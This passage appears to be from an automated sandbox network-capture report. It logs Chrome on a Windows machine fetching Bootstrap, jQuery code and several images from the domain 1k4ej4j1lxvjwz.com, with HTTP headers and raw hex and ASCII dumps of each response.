                                          2025-01-12 00:17:06 UTC7936INData Raw: 67 65 74 43 6c 69 65 6e 74 52 65 63 74 73 28 29 2e 6c 65 6e 67 74 68 29 7d 2c 53 2e 61 6a 61 78 53 65 74 74 69 6e 67 73 2e 78 68 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 6e 65 77 20 43 2e 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 7d 63 61 74 63 68 28 65 29 7b 7d 7d 3b 76 61 72 20 5f 74 3d 7b 30 3a 32 30 30 2c 31 32 32 33 3a 32 30 34 7d 2c 7a 74 3d 53 2e 61 6a 61 78 53 65 74 74 69 6e 67 73 2e 78 68 72 28 29 3b 79 2e 63 6f 72 73 3d 21 21 7a 74 26 26 22 77 69 74 68 43 72 65 64 65 6e 74 69 61 6c 73 22 69 6e 20 7a 74 2c 79 2e 61 6a 61 78 3d 7a 74 3d 21 21 7a 74 2c 53 2e 61 6a 61 78 54 72 61 6e 73 70 6f 72 74 28 66 75 6e 63 74 69 6f 6e 28 69 29 7b 76 61 72 20 6f 2c 61 3b 69 66 28 79 2e 63 6f 72 73 7c 7c 7a 74 26 26 21 69 2e 63 72
                                          Data Ascii: getClientRects().length)},S.ajaxSettings.xhr=function(){try{return new C.XMLHttpRequest}catch(e){}};var _t={0:200,1223:204},zt=S.ajaxSettings.xhr();y.cors=!!zt&&"withCredentials"in zt,y.ajax=zt=!!zt,S.ajaxTransport(function(i){var o,a;if(y.cors||zt&&!i.cr


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          73192.168.2.449823122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:05 UTC358OUTGET /bootstrap.min.js HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:06 UTC380INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:05 GMT
                                          Content-Type: application/javascript
                                          Content-Length: 60003
                                          Last-Modified: Tue, 26 Dec 2023 13:01:43 GMT
                                          Connection: close
                                          Vary: Accept-Encoding
                                          ETag: "658aceb7-ea63"
                                          Expires: Sun, 12 Jan 2025 12:17:05 GMT
                                          Cache-Control: max-age=43200
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:06 UTC16004INData Raw: 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 35 2e 32 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 30 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62
                                          Data Ascii: /*! * Bootstrap v4.5.2 (https://getbootstrap.com/) * Copyright 2011-2020 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE) */!function(t,e){"ob
                                          2025-01-12 00:17:06 UTC16384INData Raw: 6e 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6f 2e 5f 63 6f 6e 66 69 67 2e 70 61 72 65 6e 74 3f 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 70 61 72 65 6e 74 22 29 3d 3d 3d 6f 2e 5f 63 6f 6e 66 69 67 2e 70 61 72 65 6e 74 3a 74 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 63 6f 6c 6c 61 70 73 65 22 29 7d 29 29 29 2e 6c 65 6e 67 74 68 26 26 28 6e 3d 6e 75 6c 6c 29 2c 21 28 6e 26 26 28 69 3d 65 28 6e 29 2e 6e 6f 74 28 74 68 69 73 2e 5f 73 65 6c 65 63 74 6f 72 29 2e 64 61 74 61 28 22 62 73 2e 63 6f 6c 6c 61 70 73 65 22 29 29 26 26 69 2e 5f 69 73 54 72 61 6e 73 69 74 69 6f 6e 69 6e 67 29 29 29 7b 76 61 72 20 73 3d 65 2e 45 76 65 6e 74 28 22 73 68 6f 77 2e 62 73 2e 63 6f 6c 6c 61 70 73 65 22 29 3b 69 66 28 65 28 74
                                          Data Ascii: n"string"==typeof o._config.parent?t.getAttribute("data-parent")===o._config.parent:t.classList.contains("collapse")}))).length&&(n=null),!(n&&(i=e(n).not(this._selector).data("bs.collapse"))&&i._isTransitioning))){var s=e.Event("show.bs.collapse");if(e(t
                                          2025-01-12 00:17:06 UTC16384INData Raw: 73 69 74 69 6f 6e 44 75 72 61 74 69 6f 6e 46 72 6f 6d 45 6c 65 6d 65 6e 74 28 74 68 69 73 2e 5f 62 61 63 6b 64 72 6f 70 29 3b 65 28 74 68 69 73 2e 5f 62 61 63 6b 64 72 6f 70 29 2e 6f 6e 65 28 61 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 74 29 2e 65 6d 75 6c 61 74 65 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 6f 29 7d 65 6c 73 65 20 69 66 28 21 74 68 69 73 2e 5f 69 73 53 68 6f 77 6e 26 26 74 68 69 73 2e 5f 62 61 63 6b 64 72 6f 70 29 7b 65 28 74 68 69 73 2e 5f 62 61 63 6b 64 72 6f 70 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 73 68 6f 77 22 29 3b 76 61 72 20 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 5f 72 65 6d 6f 76 65 42 61 63 6b 64 72 6f 70 28 29 2c 74 26 26 74 28 29 7d 3b 69 66 28 65 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 68 61 73 43
                                          Data Ascii: sitionDurationFromElement(this._backdrop);e(this._backdrop).one(a.TRANSITION_END,t).emulateTransitionEnd(o)}else if(!this._isShown&&this._backdrop){e(this._backdrop).removeClass("show");var s=function(){n._removeBackdrop(),t&&t()};if(e(this._element).hasC
                                          2025-01-12 00:17:06 UTC11231INData Raw: 6f 74 6f 74 79 70 65 3b 72 65 74 75 72 6e 20 72 2e 69 73 57 69 74 68 43 6f 6e 74 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 67 65 74 54 69 74 6c 65 28 29 7c 7c 74 68 69 73 2e 5f 67 65 74 43 6f 6e 74 65 6e 74 28 29 7d 2c 72 2e 61 64 64 41 74 74 61 63 68 6d 65 6e 74 43 6c 61 73 73 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 65 28 74 68 69 73 2e 67 65 74 54 69 70 45 6c 65 6d 65 6e 74 28 29 29 2e 61 64 64 43 6c 61 73 73 28 22 62 73 2d 70 6f 70 6f 76 65 72 2d 22 2b 74 29 7d 2c 72 2e 67 65 74 54 69 70 45 6c 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 74 69 70 3d 74 68 69 73 2e 74 69 70 7c 7c 65 28 74 68 69 73 2e 63 6f 6e 66 69 67 2e 74 65 6d 70 6c 61 74 65 29 5b 30 5d 2c 74 68 69 73 2e
                                          Data Ascii: ototype;return r.isWithContent=function(){return this.getTitle()||this._getContent()},r.addAttachmentClass=function(t){e(this.getTipElement()).addClass("bs-popover-"+t)},r.getTipElement=function(){return this.tip=this.tip||e(this.config.template)[0],this.


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          74192.168.2.449826122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:06 UTC612OUTGET /imgs/xinpujing.png HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: image
                                          Referer: https://1k4ej4j1lxvjwz.com/css/style.css
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:06 UTC345INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:06 GMT
                                          Content-Type: image/png
                                          Content-Length: 8809
                                          Last-Modified: Tue, 01 Oct 2024 15:31:17 GMT
                                          Connection: close
                                          ETag: "66fc15c5-2269"
                                          Expires: Tue, 11 Feb 2025 00:17:06 GMT
                                          Cache-Control: max-age=2592000
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:06 UTC8809INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 fa 00 00 00 fa 08 03 00 00 00 bf 32 aa 0f 00 00 01 c8 50 4c 54 45 00 00 00 cb 9e 00 ca 9d 00 c9 9b 00 c8 9b 00 cb 9d 00 ca 9c 00 c8 9b 00 c7 9b 00 c8 9b 00 c8 9b 00 c9 9b 00 c8 9b 00 c8 9c 00 c9 9b 00 c9 9b 00 c9 9b 00 c9 9b 00 ca 9d 00 cb a1 00 c8 9b 00 c8 9c 00 c8 9b 00 c9 9a 00 c8 9a 00 c8 9b 00 c8 9c 00 c9 9b 00 c8 9b 00 c9 9b 00 c9 9c 00 c9 9c 00 c8 9b 00 c9 9c 00 c9 9b 00 c9 9c 00 c9 9b 00 c9 9b 00 c8 9b 00 c8 9a 00 c9 9c 00 c8 9b 00 c8 9b 00 c7 9b 00 c8 9a 00 c8 9b 00 c8 9c 00 c8 9c 00 c9 9b 00 c8 9b 00 ca 9d 00 c9 9c 00 c9 9b 00 c9 9b 00 c9 9a 00 c8 9a 00 cb 9d 00 c8 9b 00 c8 9b 00 c8 9b 00 c8 9b 00 c8 99 00 c8 9b 00 c8 9a 00 c6 99 00 c8 9c 00 c8 9b 00 c8 9a 00 c8 9c 00 c8 9c 00 c9 9b 00 c7
                                          Data Ascii: PNGIHDR2PLTE


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          75192.168.2.449829122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:06 UTC611OUTGET /imgs/bg.lanse.jpg HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: image
                                          Referer: https://1k4ej4j1lxvjwz.com/css/style.css
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:06 UTC349INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:06 GMT
                                          Content-Type: image/jpeg
                                          Content-Length: 296412
                                          Last-Modified: Mon, 07 Oct 2024 16:04:16 GMT
                                          Connection: close
                                          ETag: "67040680-485dc"
                                          Expires: Tue, 11 Feb 2025 00:17:06 GMT
                                          Cache-Control: max-age=2592000
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:06 UTC16035INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 09 06 07 08 07 06 09 08 08 08 0a 0a 09 0b 0e 17 0f 0e 0d 0d 0e 1c 14 15 11 17 22 1e 23 23 21 1e 20 20 25 2a 35 2d 25 27 32 28 20 20 2e 3f 2f 32 37 39 3c 3c 3c 24 2d 42 46 41 3a 46 35 3b 3c 39 ff db 00 43 01 0a 0a 0a 0e 0c 0e 1b 0f 0f 1b 39 26 20 26 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 ff c2 00 11 08 05 78 0e 09 03 01 11 00 02 11 01 03 11 01 ff c4 00 1c 00 01 00 03 01 01 01 01 01 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 ff c4 00 19 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 fd 87 d1 c0 00 05 40
                                          Data Ascii: JFIFC"##! %*5-%'2( .?/279<<<$-BFA:F5;<9C9& &99999999999999999999999999999999999999999999999999x@
                                          2025-01-12 00:17:06 UTC16384INData Raw: ac 50 24 90 09 20 00 01 24 02 48 26 8a 00 00 42 00 05 6d 19 d6 65 53 a6 5b c8 00 00 00 00 16 50 a0 85 00 02 04 90 09 20 10 09 a8 8b 10 41 24 c4 54 15 a8 20 d4 00 04 41 60 00 00 16 94 45 9c 19 de 42 21 7b 13 a3 78 88 83 8a 6e 92 d0 84 a9 0a 22 21 62 05 40 9a b4 6b ac d6 c9 b2 c4 ca 96 75 2c 5c b9 d1 9b f3 b2 c1 d3 66 e5 48 28 50 d4 dc d0 d8 b0 20 89 60 16 22 ca 46 6b 73 9e ca 99 cb 04 d9 a1 4a d2 2e 6b 1a 2e a6 85 ea 23 03 32 e6 da ce a6 99 d7 8b 2f 36 77 a5 cd 8d 2b 6b 2c 96 35 34 ab 5c cd 44 58 8a 83 3b 96 b2 04 13 51 12 40 33 ce a6 b6 4b 00 05 55 00 00 58 00 00 24 80 00 05 40 0b 5a 15 99 95 90 44 b6 2a 49 60 44 4a c5 95 52 4c b2 45 91 2d 6c aa eb 16 ab e7 40 0e 64 d0 b2 f3 9b 94 20 b4 6b 2d 2c f3 35 0b a2 66 6a 63 9b e9 e7 54 97 c0 c6 f8 f1 bf c9 fa f3
                                          Data Ascii: P$ $H&BmeS[P A$T A`EB!{xn"!b@ku,\fH(P `"FksJ.k.#2/6w+k,54\DX;Q@3KUX$@ZD*I`DJRLE-l@d k-,5fjcT
                                          2025-01-12 00:17:07 UTC16384INData Raw: 00 85 40 41 05 6c 98 bc d4 82 02 01 5a ad 42 51 69 65 a5 e9 80 00 80 29 21 40 12 09 11 15 95 cd 62 ea 05 10 48 00 17 b4 00 22 2a 83 99 78 79 f5 f6 14 92 b0 12 56 50 16 13 cf b3 d2 ce b7 4a 85 94 12 09 20 12 00 2e 69 9d 45 80 56 cc 8a 96 24 f0 d7 e7 a9 13 56 4d 0d 49 88 5e 5a a2 68 b6 40 33 21 65 37 3b e5 f2 d3 99 6e 59 25 6d 64 9a 16 8e 8a b9 d6 78 65 c9 04 9a c5 2a c9 ae 9e a9 7c df 99 c6 ff 00 3f de 7e b4 83 e1 cf a8 97 e9 93 ea 25 f3 a5 f9 8d e7 af 58 f3 ad c8 f5 13 ef a0 54 8b 31 d4 24 12 44 be 3b 51 26 0a ae b4 d0 93 ae 26 a8 6a 59 2c 0b 54 c4 50 aa 0a d5 a0 0a d4 44 20 00 0c ed e4 ce ae 44 a2 80 d0 e6 8e 6a 88 c0 b9 25 f3 66 b4 97 a2 5b 4d 74 e2 dc 14 26 5c 6b c2 de 33 b3 3b 32 8d 4b d5 4e 83 58 ea ae 3b 3d 0e 7b f6 f8 f4 f3 35 76 f5 79 b9 73 ae 1e
                                          Data Ascii: @AlZBQie)!@bH"*xyVPJ .iEV$VMI^Zh@3!e7;nY%mdxe*|?~%XT1$D;Q&&jY,TPD Dj%f[Mt&\k3;2KNX;={5vys
                                          2025-01-12 00:17:07 UTC16384INData Raw: a5 e5 33 36 ac a3 90 93 53 a8 eb b3 a8 d0 d2 b5 8b ea 5a cb a5 d6 e5 a5 8b 90 20 19 99 2d 0c 8b 59 a1 74 b9 2b a2 58 90 5a aa 80 01 50 41 08 33 b6 a6 52 e4 22 56 e7 48 11 cc b0 54 b8 97 8d 39 96 f1 dd 2f 01 ce 25 4d 73 6b 1e 87 1f 5f 8b cf ea 2c a4 d0 1c 5a e1 f2 3e 8f 8e 3a 73 af 3b 59 b6 37 e7 eb 1d 3c fa fd c4 7c 4d 7a 5c 7b 78 7e 8f 3d 6c c8 ae 75 cb 35 ee 73 e9 df ae 73 a9 e9 cd 72 c4 f4 e7 f4 d6 7d cd cf bf 9b f2 da 9f 9b cd 78 19 d5 f3 ae 7d 67 e8 cf 8e ce b9 7a f2 e6 96 b1 f4 1e 5f 5f 2e f1 1d f8 7a 67 1e f1 e0 eb 38 95 05 cd 0a 94 3a 0c 81 d0 64 49 d0 79 c6 70 36 aa 1d c7 11 e9 1e 79 42 4d 09 3d 12 a6 67 11 f4 07 9e 79 e0 dc a1 90 2a 5c d2 3e d3 1d 24 aa d8 1b a7 ea 11 e7 e7 7f 35 67 af 73 f7 7a cc 93 9b f9 03 7a 63 5f a7 6b 9f ca d7 cb af b5 ac
                                          Data Ascii: 36SZ -Yt+XZPA3R"VHT9/%Msk_,Z>:s;Y7<|Mz\{x~=lu5ssr}x}gz__.zg8:dIyp6yBM=gy*\>$5gszzc_k
                                          2025-01-12 00:17:07 UTC16384INData Raw: 3a 63 6b 98 9b c5 95 4b 3f 9b 65 f9 46 b1 1d 31 73 13 b0 1c 87 bd 5c f1 e5 82 a6 84 03 ec cf 8c 31 37 3b 0e 32 a5 48 8a d5 8d cc ca 12 40 2a 58 02 a0 b1 50 09 8f 6f cf e8 f7 b1 bd 4d ba 63 d1 e9 cb ce e7 d3 1e 7d 2d 66 72 df cf df d6 e9 8a 59 78 ee e7 be c4 f7 ba 73 e8 4e a3 9f a6 7f 2d d5 1d 7d 79 73 4b e7 72 e9 9d 78 bb c7 ed b9 7e 81 be 7e 6f 6e 73 bc 00 00 00 00 00 00 56 ad 00 02 81 78 00 01 53 1d e7 4c db 2c 93 00 00 00 00 00 00 00 00 00 00 45 56 14 28 9c 9a 6a 96 96 f1 3a 8c d9 2c 00 00 00 01 05 75 04 15 96 96 66 bb 46 f0 50 00 00 02 02 80 26 2c 00 00 00 00 00 02 95 54 99 74 00 00 54 9a 80 09 22 15 00 0a 00 24 00 00 00 01 6a 48 20 69 09 05 40 04 92 01 43 f3 fe 7d 3f 28 96 14 08 4c 73 a9 d6 44 67 53 62 cf 6c f1 f8 f6 d7 9f 5e 4b 8d 6c fd 47 8f 4f b9
                                          Data Ascii: :ckK?eF1s\17;2H@*XPoMc}-frYxsN-}ysKrx~~onsVxSL,EV(j:,ufFP&,TtT"$jH i@C}?(LsDgSbl^KlGO
                                          2025-01-12 00:17:07 UTC16384INData Raw: a1 91 18 18 23 14 39 21 96 f1 30 a9 31 25 a7 4d 69 31 34 7b d0 f6 ed 8a d9 8f c2 8e 2d ac 24 04 ab e1 28 9a dc ec 5d 6c a8 64 c4 d4 f1 76 85 09 93 b1 5d 52 1e 26 9f 88 71 42 b9 ab 7d 2d 96 3f 55 b7 56 2a ca ca cb 15 8a c5 63 ee 62 b1 58 ac 55 96 2b 15 65 8a b2 c5 5b dc c5 59 62 b1 56 58 f5 9d cc d0 82 60 42 0b 15 82 c5 62 b1 58 ac 16 2b 15 8a c5 62 b1 58 ac 56 2b 15 8a c5 62 b1 58 ac 56 2b 15 8a c5 62 b1 58 ac 56 2a ca cb 15 8a c5 62 b1 58 ac 54 c7 8f cd 30 21 1e b1 fa 36 fa a9 32 86 4c 78 5f e8 d9 62 b0 75 8b ac 56 0e b1 58 ac 56 0b 15 8a c5 62 b1 58 ac 56 2b 15 8a c5 62 b1 58 ac 56 2b 15 8a c5 62 4b 15 82 c1 d3 82 70 71 7b a8 f8 85 62 b1 58 2c 09 60 b0 58 2c 16 0b 05 82 c5 60 b1 58 2c 16 2b 15 8a c5 62 ac b1 56 58 ac 55 96 2a ca ca ca ca ca cb 17 b3 a1
                                          Data Ascii: #9!01%Mi14{-$(]ldv]R&qB}-?UV*cbXU+e[YbVX`BbX+bXV+bXV+bXV*bXT0!62Lx_buVXVbXV+bXV+bKpq{bX,`X,`X,+bVXU*
                                          2025-01-12 00:17:07 UTC16384INData Raw: 0c 4b 1f a6 15 7e b1 fa 01 fa 16 6e a7 fd 01 7e ab 97 59 5f ab 78 15 d4 72 67 f4 2c 80 5a cb 66 cb 66 cb 66 cb 66 2b 66 cb 64 2b 66 2b 06 5b 21 5b 31 58 0a c0 56 c9 96 02 b0 15 b2 65 b2 65 b3 15 80 ad 93 2d 98 ac 05 60 2b 66 2b 01 58 0a 68 99 6c 99 6c 99 6c 99 6c 99 6c 99 6c 85 14 22 80 04 56 c9 96 c9 96 c9 96 c9 96 c9 96 c9 96 c9 96 c9 96 c9 96 c9 96 c9 96 c9 96 c9 94 a1 f9 32 f4 50 88 49 18 bf a2 ac 84 4a 02 56 b6 e4 35 1e 0f 54 ef bd d3 1a 73 50 cd b2 91 89 45 2e d0 18 99 32 d4 43 65 50 ef f1 ef 4e 6a eb 25 92 cb ae e8 57 9a 85 37 b9 92 72 57 57 59 29 e4 cd f1 f2 ea 64 24 98 90 ba 1d e9 9a cb 9f 24 ed c4 ff 00 34 db 90 f3 24 24 9d d0 9a 63 de 9e 5e 15 19 70 ba 0f 34 0f 97 53 3e e5 92 14 6e b3 dc 98 90 1a ca fe e1 ee 64 cf bd 01 32 36 17 24 e2 f7 75 b9
                                          Data Ascii: K~n~Y_xrg,Zffff+fd+f+[![1XVee-`+f+Xhllllll"V2PIJV5TsPE.2CePNj%W7rWWY)d$$4$$c^p4S>nd26$u
                                          2025-01-12 00:17:07 UTC16384INData Raw: d3 73 74 4a 3e ca 90 46 c8 3b d0 03 3a 94 05 b9 28 e3 c9 d6 ce c4 84 b1 25 53 c5 bd 46 22 4a 11 df 65 95 93 4d 66 4e 57 77 74 d2 b0 c5 64 1b d5 91 f0 9b 29 f7 bb a7 ea 25 46 3b d1 35 90 92 27 ea a7 9f 02 e6 a9 47 da 29 cf ec a9 43 67 39 8f ab b2 1e f4 3d 42 5d 42 e8 10 f2 74 0e a1 3b 35 94 27 87 de e8 25 e2 42 cd 20 3b 17 27 5a ad 03 c6 f9 c5 bd 90 1e f4 29 ba 85 d4 27 bd 01 a1 7c 94 6b 89 d3 c2 27 13 b1 ac a9 28 1a cc 0f 9b a9 e7 73 72 23 e1 15 57 af 50 52 93 c6 26 f3 cd cb 08 b8 9f f9 6e 65 a6 9e b1 a9 49 78 05 a8 e9 df 9b 96 f2 45 d1 a8 25 38 e5 9e ae a2 59 23 7c 87 ca eb 55 ae 83 4f 8d ca a6 a8 03 f5 1b b4 eb 52 d6 4e be 46 18 b3 08 7c 2c fd ea 33 a8 33 70 0d c4 b4 4d 20 aa 25 ce c4 e2 37 cc b9 35 fc 87 d7 cd 6a b4 5a 86 76 92 07 68 07 b0 36 b8 b2 37
                                          Data Ascii: stJ>F;:(%SF"JeMfNWwtd)%F;5'G)Cg9=B]Bt;5'%B ;'Z)'|k'(sr#WPR&neIxE%8Y#|UORNF|,33pM %75jZvh67
                                          2025-01-12 00:17:07 UTC16384INData Raw: 94 41 35 4c d8 43 14 b3 4a fd c0 39 12 a8 a2 aa a4 26 1a 98 9e 13 f2 bf 12 78 dd 53 4b b1 93 68 d0 c5 27 a4 bc 4a b6 be ab 53 36 2a a9 c6 c1 c8 04 71 61 fd 91 50 05 3f 8c c5 9d 44 fa 58 fe 72 70 51 cd a3 77 45 34 bf 20 25 4c 60 ff 00 ea 7a 25 5c 9f 3c 41 44 3a bf 75 2e 9f 42 de 66 45 29 21 d3 ea 27 6c 67 9f 50 ac f4 8c 76 20 87 4f 1d 34 76 b1 e9 a1 4a df 16 39 9a 3a 1a ea f6 8a 2b cb 48 06 57 23 2e dd 87 c8 55 0d 14 14 30 ec a1 0f f1 bf a9 28 e3 55 33 43 4d 09 cd 3c 8d 1c 61 cc 89 52 6b 34 35 39 ef 38 d9 bb e5 6c 6e a4 d7 29 1b f3 64 f2 fd 9e cf ef 5a bf 49 1c c5 c4 25 08 83 ce eb 46 d4 02 ef a7 cf 72 a1 97 78 17 68 a2 77 ef 53 c1 35 0d 59 08 1e ce 68 4f bb b9 fc c7 d0 96 81 d2 31 9a 82 a1 ea 77 94 21 b5 76 1f 87 be c8 f0 d4 a8 a7 86 ed e5 fe 22 ea 0b 46
                                          Data Ascii: A5LCJ9&xSKh'JS6*qaP?DXrpQwE4 %L`z%\<AD:u.BfE)!'lgPv O4vJ9:+HW#.U0(U3CM<aRk4598ln)dZI%FrxhwS5YhO1w!v"F
                                          2025-01-12 00:17:07 UTC16384INData Raw: 83 f1 2a 88 46 7a 69 aa a9 8f 30 84 87 6a 26 38 9b 09 78 be cf 56 8f 00 0d 3d 66 a5 38 67 0d 30 63 10 97 23 94 b9 32 ac 96 59 a7 39 64 2c a5 3e d2 89 96 8f a2 d6 ea 9b c0 30 82 fc 52 aa 83 66 ca 08 8b 26 1e 67 f1 12 d3 07 fd 2c 1f ba 2e 3f dd bd 04 33 d7 56 b0 c6 39 4d 31 58 59 68 34 01 5f 25 6c 5c a2 a1 96 9e 99 8b cc 40 ae 7f c4 4b a7 f3 fb 36 a5 0d 47 7c 74 d9 7f fb 41 54 bf 84 39 61 82 31 7d 28 6f 10 88 5f 6a a8 fa 55 4f f8 d6 ae b8 a8 8d b6 b3 45 3e e2 bd ac 38 a1 a8 80 fd a4 a8 e2 0f 66 90 cb 28 4f 88 b0 e4 d9 79 78 95 7d 07 b3 e5 2c 5b e1 f5 f0 7d a5 a3 0d b5 3a 32 f8 6a 22 fe f5 2d e9 cf 84 b1 70 75 4b a8 4a c0 d9 28 ab 42 46 df 6b fe e5 49 a8 45 13 b5 ea ca 1f bf 25 a3 ce 2f 0b 94 75 31 55 65 bc b0 3b e2 2a 29 f3 c9 1e 04 18 c8 39 02 0a 00 0c 8e
                                          Data Ascii: *Fzi0j&8xV=f8g0c#2Y9d,>0Rf&g,.?3V9M1XYh4_%l\@K6G|tAT9a1}(o_jUOE>8f(Oyx},[}:2j"-puKJ(BFkIE%/u1Ue;*)9


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          76192.168.2.449828122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:06 UTC609OUTGET /imgs/kaiyun.png HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: image
                                          Referer: https://1k4ej4j1lxvjwz.com/css/style.css
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:06 UTC345INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:06 GMT
                                          Content-Type: image/png
                                          Content-Length: 6379
                                          Last-Modified: Tue, 01 Oct 2024 15:31:15 GMT
                                          Connection: close
                                          ETag: "66fc15c3-18eb"
                                          Expires: Tue, 11 Feb 2025 00:17:06 GMT
                                          Cache-Control: max-age=2592000
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
